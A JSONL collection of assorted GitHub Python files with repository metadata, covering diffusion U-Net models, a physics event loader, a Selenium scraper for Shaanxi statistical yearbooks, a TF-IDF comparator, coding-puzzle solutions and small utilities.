+{"seq_id":"12168140958","text":"import math\nimport torch\nfrom torch import nn\n\nclass Block(nn.Module):\n def __init__(self, in_ch, out_ch, time_emb_dim, up=False):\n super().__init__()\n self.time_mlp = nn.Linear(time_emb_dim, out_ch)\n if up:\n self.conv1 = nn.Conv2d(2 * in_ch, out_ch, 3, padding=1)\n self.transform = nn.ConvTranspose2d(out_ch, out_ch, 4, 2, 1)\n else:\n self.conv1 = nn.Conv2d(in_ch, out_ch, 3, padding=1)\n self.transform = nn.Conv2d(out_ch, out_ch, 4, 2, 1)\n self.conv2 = nn.Conv2d(out_ch, out_ch, 3, padding=1)\n self.bnorm1 = nn.BatchNorm2d(out_ch)\n self.bnorm2 = nn.BatchNorm2d(out_ch)\n self.relu = nn.ReLU()\n\n def forward(self, x, t):\n h = self.bnorm1(self.relu(self.conv1(x)))\n time_emb = self.relu(self.time_mlp(t))\n time_emb = time_emb[(...,) + (None,) * 2]\n h = h + time_emb\n h = self.bnorm2(self.relu(self.conv2(h)))\n return self.transform(h)\n\n\nclass SinusoidalPositionEmbeddings(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, time):\n device = time.device\n half_dim = self.dim // 2\n embeddings = math.log(10000) / (half_dim - 1)\n embeddings = torch.exp(torch.arange(half_dim, device=device) * -embeddings)\n embeddings = time[:, None] * embeddings[None, :]\n embeddings = torch.cat((embeddings.sin(), embeddings.cos()), dim=-1)\n # TODO: Double check the ordering here\n return embeddings\n\n\nclass SimpleUnet(nn.Module):\n def __init__(self):\n super().__init__()\n image_channels = 3\n down_channels = (64, 128, 256, 512, 1024)\n up_channels = (1024, 512, 256, 128, 64)\n out_dim = 3\n time_emb_dim = 32\n\n self.time_mlp = nn.Sequential(\n SinusoidalPositionEmbeddings(time_emb_dim),\n nn.Linear(time_emb_dim, time_emb_dim),\n nn.ReLU(),\n )\n self.conv0 = nn.Conv2d(image_channels, down_channels[0], 3, padding=1)\n self.downs = nn.ModuleList(\n [\n Block(down_channels[i], down_channels[i + 1], time_emb_dim)\n for i in range(len(down_channels) - 1)\n ]\n )\n self.ups = nn.ModuleList(\n [\n Block(up_channels[i], up_channels[i + 1], time_emb_dim, up=True)\n for i in range(len(up_channels) - 1)\n ]\n )\n self.output = nn.Conv2d(up_channels[-1], out_dim, 1)\n\n def forward(self, x, timestep):\n t = self.time_mlp(timestep)\n x = self.conv0(x)\n residual_inputs = []\n for down in self.downs:\n x = down(x, t)\n residual_inputs.append(x)\n for up in self.ups:\n residual_x = residual_inputs.pop()\n x = torch.cat((x, residual_x), dim=1)\n x = up(x, t)\n return self.output(x)\n\n\nclass UNet(nn.Module):\n def __init__(self, in_channels=1, out_channels=1):\n super().__init__()\n self.down_layers = torch.nn.ModuleList(\n [\n nn.Conv2d(in_channels, 32, kernel_size=5, padding=2),\n nn.Conv2d(32, 64, kernel_size=5, padding=2),\n nn.Conv2d(64, 64, kernel_size=5, padding=2),\n ]\n )\n self.up_layers = torch.nn.ModuleList(\n [\n nn.Conv2d(64, 64, kernel_size=5, padding=2),\n nn.Conv2d(64, 32, kernel_size=5, padding=2),\n nn.Conv2d(32, out_channels, kernel_size=5, padding=2),\n ]\n )\n self.act = nn.SiLU()\n self.downscale = nn.MaxPool2d(2)\n self.upscale = nn.Upsample(scale_factor=2)\n\n def forward(self, x):\n h = []\n for i, l in enumerate(self.down_layers):\n x = self.act(l(x))\n if i < 2:\n h.append(x)\n x = self.downscale(x)\n\n for i, l in enumerate(self.up_layers):\n if i > 0:\n x = self.upscale(x)\n x += h.pop()\n x = self.act(l(x))\n\n return 
x","repo_name":"HamzaYousVision/transformers-in-vision","sub_path":"diffusion_models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16141346320","text":"import os\nfrom .ReadBinary import ReadBlock as rb\nfrom .ReadText import ReadFile as rt\nimport traceback\nimport numpy as np\n\n\nfull_loadlist = ['fastDAQ', 'slowDAQ', 'PMTtraces', 'event',\n 'camdata', 'images', 'DAQsetings']\n\n\ndef GetEvent(rundirectory, ev, *loadlist, max_file_size=None):\n event = dict()\n event_dir = os.path.join(rundirectory, str(ev))\n for key in full_loadlist:\n event[key] = dict(loaded=False)\n\n neglist = False\n if len(loadlist) == 0:\n loadlist = full_loadlist\n elif len(loadlist[0]) > 0 and loadlist[0][0:1] == '~':\n neglist = True\n\n if ('fastDAQ' in loadlist) or (neglist and '~fastDAQ' not in loadlist):\n i_file = 0\n while True:\n\n binfile = os.path.join(event_dir,\n 'fastDAQ_' + str(i_file) + '.bin')\n calfile = os.path.join(event_dir,\n 'fastDAQ_' + str(i_file) + '_cal.txt')\n\n if not (os.path.exists(binfile) and os.path.exists(calfile)):\n break\n\n try:\n d_bin = rb(binfile, max_file_size=max_file_size)\n d_cal = rt(calfile)\n d = dict()\n for key in d_bin:\n d[key] = d_bin[key] * d_cal[key + '_multiplier'] + \\\n d_cal[key + '_offset']\n if 'time' in d_bin:\n print(\"Whoa, there's a field named time in fastDAQ_\" +\n str(i_file))\n d['time'] = (range(d[list(d.keys())[0]].size) -\n d_cal['pretrigger_samples']) * d_cal['dt']\n if 'bindata' in d_bin:\n print(\"Whoa, there's a field named bindata in fastDAQ_\" +\n str(i_file))\n d['bindata'] = d_bin\n if 'caldata' in d_bin:\n print(\"Whoa, there's a field named caldata in fastDAQ_\" +\n str(i_file))\n d['caldata'] = d_cal\n\n except:\n print('Failed to load fastDAQ_' + str(i_file))\n traceback.print_exc()\n break\n\n if i_file == 0:\n event['fastDAQ'] = d\n event['fastDAQ']['multiboards'] = [d]\n else:\n event['fastDAQ']['multiboards'].append(d)\n\n event['fastDAQ']['loaded'] = True\n i_file += 1\n\n if ('slowDAQ' in loadlist) or (neglist and '~slowDAQ' not in loadlist):\n try:\n d = rt(os.path.join(event_dir, 'slowDAQ_0.txt'))\n event['slowDAQ'] = d\n event['slowDAQ']['loaded'] = True\n except:\n print('Failed to load slowDAQ_0.txt')\n traceback.print_exc()\n\n if ('PMTtraces' in loadlist) or (neglist and '~PMTtraces' not in loadlist):\n try:\n d = rb(os.path.join(event_dir, 'PMTtraces.bin'), max_file_size=max_file_size)\n event['PMTtraces'] = d\n event['PMTtraces']['loaded'] = True\n except:\n print('Failed to load PMTtraces')\n traceback.print_exc()\n\n\n if ('event' in loadlist) or (neglist and '~event' not in loadlist):\n try:\n with open(os.path.join(event_dir, 'Event.txt'), 'r') as ev_txt:\n ev_str = next(ev_txt)\n ev_dat = ev_str.split()\n event['event']['run_type'] = np.int32(ev_dat[2])\n event['event']['trigger_main'] = np.int32(ev_dat[3])\n event['event']['trigger_cameras'] = np.int32(ev_dat[4])\n event['event']['trigger_PLC'] = np.int32(ev_dat[5])\n event['event']['trigger_slowDAQ'] = np.int32(ev_dat[6])\n event['event']['timestamp'] = np.float64(ev_dat[7])\n event['event']['mstick'] = np.int64(ev_dat[8])\n event['event']['Pset'] = np.float64(ev_dat[9])\n event['event']['livetime'] = np.float64(ev_dat[10])\n event['event']['loaded'] = True\n except:\n print('Failed to load Event')\n traceback.print_exc()\n\n return event\n","repo_name":"SBC-Collaboration/SBC-Analysis","sub_path":"DataHandling/GetSBCEvent.py","file_name":"GetSBCEvent.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"17074534284","text":"# -*- coding: utf-8 -*- \n\n\nimport time\nfrom util.utilis import *\nfrom util.logger import Logger\nimport os\nfrom selenium import webdriver\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nfrom util.utilis import *\nimport os.path as osp\n\ninfo_log = Logger('../log/guizhou_info.log','info')\nerror_log = Logger('../log/guizhou_error.log','info')\ninfo_log.logger.info('开始爬取数据了')\nerror_log.logger.error('请检查网络设置,目前断线')\nfrom bs4 import BeautifulSoup\nyear_list = sorted(list(range(2010,2020,1)),reverse =True)\ndownload_dir = os.path.abspath('./data')\noptions = webdriver.ChromeOptions()\nprefs = { 'download.default_directory': download_dir}\noptions.add_experimental_option('prefs', prefs)\ndriver = webdriver.Chrome(chrome_options=options)\n\ndef write_json(json_fn, json_dict):\n if not os.path.exists(json_fn):\n write_list = [json_dict]\n else:\n write_list = read_json(json_fn)\n write_list.append(json_dict)\n with open(json_fn, \"w\",encoding='utf-8') as f:\n json.dump(write_list, f, ensure_ascii=False,indent=4)\ndef getDonwLoadFileName(download_path, filaname, timing):\n '''\n 用于检查文件是否下载完成,当下载完成时会从这个函数跳出\n\n :param download_path: chromeDiver默认下载文件的位置\n :param row: 字典形式,由页面解析生成的,负责提供下载的文件名称信息\n :return:\n '''\n\n # document_name_zip = row['文件名称']+'.zip'\n # document_name_rar = row['文件名称']+'.rar'\n # check_down_load_path_zip = os.path.join(download_path,document_name_zip)\n # check_down_load_path_rar = os.path.join(download_path, document_name_rar)\n time_hold = 0\n while True:\n # if os.path.exists(check_down_load_path_zip):\n # document_name = document_name_zip\n # break\n # if os.path.exists(check_down_load_path_rar):\n # document_name = document_name_rar\n # break\n try:\n newest_file = newest_filename(download_path)\n finished_time = os.path.getatime(os.path.join(download_path, newest_file))\n except:\n newest_file = ''\n finished_time = 0\n if timing <= finished_time and 'download' not in newest_file and '.tmp' not in newest_file :\n time.sleep(1)\n return newest_file\n time.sleep(1)\n time_hold += 1\n if time_hold >= 50:\n error_log.logger.error('如果文件没下载完,按任意键继续;如果网络问题,请输入 quit 退出')\n a = input()\n if a == 'quit':\n return a\n # time.sleep(0.5)\n # return document_name\n\n\ndef newest_filename(path_file):\n '''\n 给定文件目录,返回最新下载的文件信息\n Args:\n path_file:文件目录\n\n Returns: File_Path\n\n '''\n lists = os.listdir(path_file)\n lists.sort(key=lambda fn: os.path.getmtime(path_file + '\\\\' + fn))\n\n return lists[-1]\n\n\n\n\ndef main():\n\n if os.path.exists('shanxi.json'):\n json_list = read_json('shanxi.json')\n else:\n json_list = []\n url_list = [\n 'http://tjj.shaanxi.gov.cn/upload/n2020/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2020/pro/3sxtjnj/zk/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/201802/zk/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2018/7/zk/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2016/tongjinianj2016/2016/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2016/tongjinianj/2015/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2014/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2013/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2012/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2011/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2010/indexce.htm'\n ]\n for year,base_url in zip(year_list,url_list):\n\n # base_url = 'http://tjj.shaanxi.gov.cn/upload/{}/zk/indexce.htm'.format(2018)\n driver.get(base_url)\n driver.switch_to.frame(1)\n html = driver.page_source\n soup = BeautifulSoup(html, 
'html.parser')\n # download_list = driver.find_elements_by_xpath(\"//table[@id='fileListTable']//a\")\n ####整个目录\n topic_list = soup.find_all('li',attrs = {'id':'foldheader'})\n\n\n for topic in topic_list:\n if topic.text == '统计图' or topic.text == '附录':\n continue\n topic_str = ''.join(topic.text.split('、')[-1].split())\n try:\n file_list = topic.find_parent().find_next_sibling('ul',attrs = {'id':'foldinglist'}).find_all('li')\n except:\n file_list = topic.find_next_sibling('ul',attrs = {'id':'foldinglist'}).find_all('li')\n tongming_num = 1\n previous_file_name = ''\n for file in file_list:\n if 'xls' in file.a.get('href') or 'xlrx' in file.a.get('href'):\n file_json = {}\n file_json['topic'] = topic_str\n file_json['info'] = {}\n\n click_name = file.text\n if len(click_name.split())>1:\n raw_file_name = click_name.split()[0]\n cur_file_name = ' '.join(click_name.split()[1:])\n else:\n raw_file_name = click_name.split()[0]\n cur_file_name = click_name.split()[-1]\n\n if '续表' in cur_file_name:\n cur_file_name = previous_file_name +'_'+ cur_file_name.replace('续表','')\n elif previous_file_name == cur_file_name:\n cur_file_name = cur_file_name + '_' + str(tongming_num)\n tongming_num += 1\n else:\n previous_file_name = cur_file_name\n tongming_num = 1\n cur_file_name = str(year)+ '_' + cur_file_name\n cur_time = time.time()\n click_button = driver.find_element_by_xpath(\"//*[text()='{}']\".format(click_name))\n click_button.click()\n latestDownloadedFileName = getDonwLoadFileName(download_dir, raw_file_name, cur_time)\n\n if latestDownloadedFileName == 'quit':\n continue\n\n path = osp.join(download_dir, latestDownloadedFileName)\n\n if osp.exists(path):\n pass\n else:\n info_log.logger('不��在这个文件:'+path)\n continue\n # raise ValueError('这文件都不存在啊')\n\n pre_name, format_name = latestDownloadedFileName.split('.')\n # new_name = cur_file_name + '.' + format_name\n newpath = osp.join(download_dir, cur_file_name + '.' + format_name)\n # try:\n time.sleep(1)\n if osp.exists(newpath):\n info_log.logger.info('已经保存过这个文件了,不保存了哦!')\n continue\n os.rename(path, newpath)\n if osp.exists(newpath) and not osp.exists(path):\n info_log.logger.info('已保存:'+newpath)\n else:\n error_log.logger.error('!!!!!!!!!!!!!!!!!没找到:'+ newpath)\n error_time = 0\n while(True):\n time.sleep(1)\n error_time +=1\n if not osp.exists(path):\n break\n if error_time >=50:\n error_log.logger.error('真的rename不到文件诶')\n continue\n\n\n # time.sleep(5)\n # os.rename(path, newpath)\n # raise ValueError('这文件都不存在啊')\n # except:\n # time.sleep(2)\n # os.rename(path, newpath)\n file_json['name'] = cur_file_name\n json_list.append(file_json)\n with open('../info/shanxi.json', \"w\", encoding='utf-8') as f:\n json.dump(json_list, f, ensure_ascii=False, indent=4)\n\n del cur_file_name\n\nif __name__ == '__main__':\n main()\n","repo_name":"Gyhfresh/web-crawler-master","sub_path":"yearbook/shaanxi.py","file_name":"shaanxi.py","file_ext":"py","file_size_in_byte":8630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27440137180","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom pipeline.comparators import BaseComparator\nimport faiss\n\n\nclass TFIDFComparator(BaseComparator):\n def compare(self, query_document, documents, num_results=10):\n # Combine title and text to create documents for TF-IDF\n documents_str = documents[\"title\"] + \" \" + documents[\"text\"]\n\n # Vectorize the documents using TF-IDF\n tfidf_vectorizer = TfidfVectorizer()\n tfidf_matrix = tfidf_vectorizer.fit_transform(documents_str)\n\n # Convert TF-IDF matrix to dense vectors for FAISS\n dense_tfidf_matrix = tfidf_matrix.toarray()\n\n # Build FAISS index\n index = faiss.IndexFlatL2(dense_tfidf_matrix.shape[1])\n index.add(dense_tfidf_matrix)\n\n # Transform and preprocess the query document\n query_tfidf_vector = tfidf_vectorizer.transform([query_document]).toarray()\n\n num_results = min(num_results, len(documents_str))\n\n # Perform similarity search using FAISS\n distances, indices = index.search(query_tfidf_vector, num_results)\n\n # Retrieve the most similar documents from your DataFrame based on indices\n return documents.iloc[indices[0]]\n\n\nif __name__ == '__main__':\n test_document = \"Coronavirus was first discovered in Wuhan, China in 2019.\"\n\n documents = pd.DataFrame(columns=[\"title\", \"text\"])\n documents.loc[0] = [\"Trump\", \"Trump is the former president of the United States\"]\n documents.loc[1] = [\"Coronavirus\", \"Coronavirus is a virus that causes COVID-19\"]\n documents.loc[2] = [\"Biden\", \"Biden is the current president of the United States\"]\n\n comparator = TFIDFComparator()\n print(comparator.compare(test_document, documents))\n","repo_name":"Weikang01/fake_news_detector","sub_path":"pipeline/comparators/tfidf_comparator.py","file_name":"tfidf_comparator.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70732506087","text":"#!/usr/bin/env python3\n\nimport sys\n\nFINAL_POSITION = 4086\nDECK_SIZE = 10007\n\nDEAL_INC=\"deal with increment \"\nNEW_STACK=\"deal into new stack\"\nCUT=\"cut \"\n\ndef parse(l):\n if l.startswith(DEAL_INC):\n return (deal, [int(l[len(DEAL_INC):])])\n elif l.startswith(NEW_STACK):\n return (new_stack, [])\n elif l.startswith(CUT):\n return (cut, [int(l[len(CUT):])])\n else:\n sys.stderr.write(\"Parse error ! {}\\n\".format(l))\n\ndef new_stack(params):\n a,b = params\n return (-a, -b - 1)\n\ndef cut(params, n):\n a,b = params\n return (a, b - n)\n\ndef deal(params, n):\n a,b = params\n return (n * a, n * b)\n\nwith open(\"day22_i.txt\") as f:\n shuffle = [parse(l) for l in f.readlines()]\n\nab = (1, 0)\nfor op, arg in shuffle:\n ab = op(ab, *arg)\n ab = (ab[0] % DECK_SIZE, ab[1] % DECK_SIZE)\n\nprint(\"Deck shuffler equation : {} * x + {} [{}]\".format(ab[0], ab[1], DECK_SIZE))\nprint(\"Position of card 2019 after shuffling a small deck : {}\".format(\n ((ab[0] * 2019 + ab[1]) % DECK_SIZE)))\n\n\nprint(\"Upping the ante\")\nDECK_SIZE=119315717514047\nSHUFFLE_COUNT=101741582076661\nFINAL_POS=2020\n\nprint(\"New deck size : {}\".format(DECK_SIZE))\nab = (1, 0)\nfor op, arg in shuffle:\n ab = op(ab, *arg)\n ab = (ab[0] % DECK_SIZE, ab[1] % DECK_SIZE)\n\nprint(\"1xDeck shuffler equation : {} * x + {} [{}]\".format(ab[0], ab[1], DECK_SIZE))\ninv = (pow(ab[0], -1, mod=DECK_SIZE), (-ab[1] % DECK_SIZE))\nprint(\"Inverse equation : - {} * {}\".format(inv[1], inv[0]))\n\nprint(\"Position of card 2019 after shuffling a big deck once : {}\".format(\n ((ab[0] * FINAL_POS + ab[1]) % DECK_SIZE)))\npos = (ab[0] * 2019 + ab[1]) % DECK_SIZE\nant = ((pos + inv[1]) * inv[0]) % DECK_SIZE\nprint(\"Trying to revert ? {}\".format(ant))\npos = (ab[0] * pos + ab[1]) % DECK_SIZE\nprint(\"Twice : {}\".format(pos))\nant = ((pos + inv[1]) * inv[0]) % DECK_SIZE\nant = ((ant + inv[1]) * inv[0]) % DECK_SIZE\nprint(\"Revert twice: {}\".format(ant))\n\ndef rev(pos, it, ab):\n r = (pow((1 - ab[0]), -1, DECK_SIZE) * ab[1]) % DECK_SIZE\n a_n = pow(ab[0], -it, mod=DECK_SIZE)\n inv = ((pos - r) * a_n + r) % DECK_SIZE\n return inv\n\nprint(\"Trying to generic revert twice ? {}\".format(rev(15965746545382, 2, ab)))\n\n# Finally\nprint(\"Trying to revert ? {}\".format(rev(2020, SHUFFLE_COUNT, ab)))\n","repo_name":"ey3ball/adventofcode2019","sub_path":"day22/day22_2.py","file_name":"day22_2.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32133240297","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# https://www.hackerrank.com/challenges/max-array-sum\n\n# Using tabulation (bottom up approach) \n# Note that in the dp dictionary, we store the max sum for the subarray up till the length of the subarray. Hence, we simply return the last item in this dictionary to get the answer\n\ndef maxSubsetSum(arr):\n dp = {} # key : max index of subarray, value = sum\n dp[0], dp[1] = arr[0], max(arr[0], arr[1])\n for i, num in enumerate(arr[2:], start=2):\n dp[i] = max(dp[i-1], dp[i-2]+num, dp[i-2], num)\n return dp[len(arr)-1]\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n res = maxSubsetSum(arr)\n\n fptr.write(str(res) + '\\n')\n\n fptr.close()\n","repo_name":"Bidek56/HackerRank","sub_path":"Python/max-array-sum.py","file_name":"max-array-sum.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"39874546510","text":"#!/usr/bin/python3\n\nimport yarp\nimport sys\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport os\nimport pickle\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../../ergonomic_assessment/src/')))\n\nimport AE\nimport tools\nfrom Skeleton import Skeleton\nfrom ErgoAssessment import ErgoAssessment\nfrom HumanPosture import HumanPosture\n\nclass RealTimePlotModule():\n\t\"\"\"\n\tThis module plots a bar chart with the probability distribution on the states.\n\tUsage\n\tpython plot_probabilities.py\n\tInput port: /processing/NamePort:o\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.app = pg.mkQApp()\n\t\tpg.setConfigOption('background', 'w')\n\t\tpg.setConfigOption('foreground', 'k')\n\n\t\tself.view = pg.PlotWidget()\n\t\tself.view.resize(800, 600)\n\t\tself.view.setWindowTitle('Ergonomic score in latent space')\n\t\tself.view.setAspectLocked(True)\n\t\tself.view.show()\n\n\t\tself.port = yarp.BufferedPortBottle()\n\t\tself.port.open('/plot_latentspace')\n\n\t\tmetric = 'jointAngle'\n\t\tergo_name = ['TABLE_REBA_C']\n\n\t\tsize_latent = 2\n\t\tdx = 0.1\n\n\t\tloss = [[]]\n\t\tautoencoder = []\n\n\t\tall_score = []\n\t\tall_size = []\n\t\ttype_data = []\n\t\tpath_src = \"/home/amalaise/Documents/These/code/ergo_prediction/ergonomic_assessment/src/\"\n\t\tpath = path_src + \"save/AE/\" + metric + \"/\" + str(size_latent) + '/'\n\t\tlist_files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]\n\t\tlist_files.sort()\n\t\tfile = list_files[0]\n\n\t\twith open(path + file, 'rb') as input:\n\t\t\tautoencoder = pickle.load(input)\n\n\t\tinput_data = autoencoder.get_data_test()\n\t\tdata_output, encoded_data, score = autoencoder.test_model(input_data)\n\t\tscore = autoencoder.evaluate_model(input_data, data_output, metric)\n\t\t\n\t\tMax = np.max(encoded_data, axis = 0)\n\t\tMin = np.min(encoded_data, axis = 0)\n\t\tMean = np.mean(encoded_data, axis = 0)\n\n\t\t# Compute ergo score\n\t\tergo_assessment = ErgoAssessment(path_src + 'config/rula_config.json')\n\t\tlist_ergo_score = ergo_assessment.get_list_score_name()\n\t\tlist_ergo_score.sort()\n\n\t\treduce_posture = HumanPosture(path_src + 'config/mapping_joints.json')\n\t\tposture = Skeleton('dhm66_ISB_Xsens.urdf')\n\n\t\tself.X = np.arange(0.0, 1.0+dx, dx)\n\n\t\tself.ergo_grid = np.zeros((len(self.X), len(self.X)))\n\n\t\tfor i, data_x in enumerate(self.X):\n\t\t\tfor j, data_y in enumerate(self.X):\n\n\t\t\t\tx = np.zeros((1,size_latent))\n\t\t\t\tx[0, 0] = data_x\n\t\t\t\tx[0, 1] = data_y\n\n\t\t\t\tdecoded_data = autoencoder.decode_data(x)\n\t\t\t\tif metric == 'posture':\n\t\t\t\t\twhole_body = reduce_posture.reduce2complete(decoded_data[0])\n\t\t\t\t\tposture.update_posture(whole_body)\n\t\t\t\telse:\n\t\t\t\t\tposture.update_posture(decoded_data[0])\n\n\t\t\t\tergo_score = tools.compute_sequence_ergo(decoded_data[0], 0, ergo_name, path_src)[0]\n\t\t\t\tif ergo_score == 1:\n\t\t\t\t\tergo_score = 1\n\t\t\t\telif 1 < ergo_score < 5:\n\t\t\t\t\tergo_score = 2\n\t\t\t\telif 4 < ergo_score < 6:\n\t\t\t\t\tergo_score = 3\n\t\t\t\telse:\n\t\t\t\t\tergo_score = 4\n\n\t\t\t\tself.ergo_grid[j,i] = ergo_score\n\n\t\tself.flag = 0\n\n\t\tself.plot_latent_space()\n\n\n\tdef plot_latent_space(self, x=0, y=0):\n\t\tif self.flag:\n\t\t\tself.view.removeItem(self.scatter)\n\t\telse:\n\t\t\tself.flag = 1\n\n\t\tself.scatter = 
pg.ScatterPlotItem(pen=pg.mkPen(width=10, color='r'), symbol='o', size=1)\n\t\tplot_traj = pg.PlotItem(pen=pg.mkPen(width=5, color='r'), size=1)\n\n\t\timg_np = np.rot90(np.rot90(np.rot90(self.ergo_grid)))\n\t\t\n\t\timg = pg.ImageItem(img_np)\n\n\t\tself.scatter.setData(x=[x], y=[y])\n\t\tplot_traj.setData(x, y)\n\n\t\timg.setZValue(-100)\n\t\tself.view.addItem(img)\n\t\tself.view.addItem(self.scatter)\n\t\t\n\t\n\tdef update(self):\n\t\tb_in = self.port.read()\n\t\tdata = b_in.toString().split(' ')\n\n\t\tdel data[0]\n\n\t\tdata = list(map(float, data))\n\t\tdata = np.asarray(data)\n\n\t\tself.plot_latent_space(x=data[0]*len(self.X), y=len(self.X)-data[1]*len(self.X))\n\n\t\tQtGui.QApplication.processEvents()\n\n\t\treturn\n\n\tdef close(self):\n\t\tyarp.Network.disconnect(self.input_port, self.port.getName())\n\t\tself.port.close()\n\t\tsys.exit(self.app.exec_())\n\n\nif __name__==\"__main__\":\n\tyarp.Network.init()\n\trf = yarp.ResourceFinder()\n\trf.configure(sys.argv)\n\n\tfig = RealTimePlotModule()\n\n\twhile(True):\n\t\ttry:\n\t\t\tfig.update()\n\t\t\ti = 0\n\t\texcept KeyboardInterrupt:\n\t\t\tfig.close()\n\t\t\tbreak\n\n","repo_name":"inria-larsen/ergo_prediction","sub_path":"Modules/online_assessment/visualisation/src/plt_latent_space_online.py","file_name":"plt_latent_space_online.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"18548543930","text":"from Data_Structures.graph.graph import Graph, Vertex\n\ndef test_breadth_fisrt_graph():\n g = Graph()\n node1 = g.add_node('node1')\n node2 = g.add_node('node2')\n g.add_edge(node1,node2)\n assert g.breadth_first_search(node1) == ['node1','node2']\n\ndef test_breadth_first_graph():\n g = Graph()\n node1 = g.add_node('a')\n node2 = Vertex('s')\n assert g.breadth_first_search(node2) == \"Start node does not exist\"\n","repo_name":"mhn998/-data-structures-and-algorithms","sub_path":"python/tests/challenges/test_bfs_graph.py","file_name":"test_bfs_graph.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42498649585","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef padding(img, h, w, h_, w_):\n h1 = int((h_-h)/2)\n h2 = int((h_-h)/2) + h\n w1 = int((w_-w)/2)\n w2 = int((w_-w)/2) + w\n img_pad = np.ones([h_,w_,3])*255\n img_pad[h1:h2, w1:w2, :] = img\n return img_pad\n\ndef resizeImage(img, h_, w_):\n h, w = img.shape[:2]\n if w < w_ and h < h_:\n img = padding(img, h, w, h_, w_)\n \n elif w >= w_ and h < h_:\n new_w = w_\n new_h = int(h*new_w/w)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n elif w < w_ and h >= h_:\n new_h = h_\n new_w = int(w*new_h/h)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n else:\n r = max(w/w_, h/h_)\n new_w = max(min(w_, int(w / r)), 1)\n new_h = max(min(h_, int(h / r)), 1)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n return img\n\ndef preprocess(path, h, w):\n img = cv2.imread(path)\n img = resizeImage(img, h, w)\n img = np.clip(img, 0, 255)\n img = np.uint8(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n img = img.astype(np.float32)\n img = img/255\n return img","repo_name":"TismeetSingh14/HTR_V1","sub_path":"Preprocessor.py","file_name":"Preprocessor.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1815907303","text":"import json\nimport os\nimport sys\nimport codecs\nimport random\n\nstdout_encoding = sys.stdout.encoding or sys.getfilesystemencoding()\n\nf = codecs.open(\"wordlist.json\", \"r\",'utf-8')\nf2 = codecs.open(\"wordlist2_clean.json\", \"r\",'utf-8')\nf3 = codecs.open(\"wordlist3_clean.json\", \"r\",'utf-8')\n\nwordlist = json.load(f)\nwordlist2 = json.load(f2)\nwordlist3 = json.load(f3)\n\nl = list(wordlist3.keys())\n\n# for i in l:\n# if i in wordlist or i in wordlist2:\n# del wordlist3[i]\n\nc1 = [\"#db5e5e\", \"#db7d5e\", \"#dba15e\", \"#dbb85e\", \"#dbd75e\", \"#9ddb5e\"]\nc2 = [\"#5edbd5\", \"#5ea3db\", \"#5e75db\", \"#2d6acc\", \"#2248f2\", \"#7222f2\"]\nc3 = [\"#db40de\", \"#de4094\", \"#9c2754\", \"#9c2744\", \"#c42f4f\", \"#c42f2f\"]\n\nfor i in wordlist:\n wordlist[i][\"seen\"] = 0\n wordlist[i][\"mastered\"] = 0\n wordlist[i][\"color\"] = random.choice(c1)\n\nfor i in wordlist2:\n wordlist2[i][\"seen\"] = 0\n wordlist2[i][\"mastered\"] = 0\n wordlist2[i][\"color\"] = random.choice(c2)\n\nfor i in wordlist3:\n wordlist3[i][\"seen\"] = 0\n wordlist3[i][\"mastered\"] = 0\n wordlist3[i][\"color\"] = random.choice(c3)\n\nprint(wordlist3)","repo_name":"keshav99/personalsite","sub_path":"german/flashcards/clean_jsons.py","file_name":"clean_jsons.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
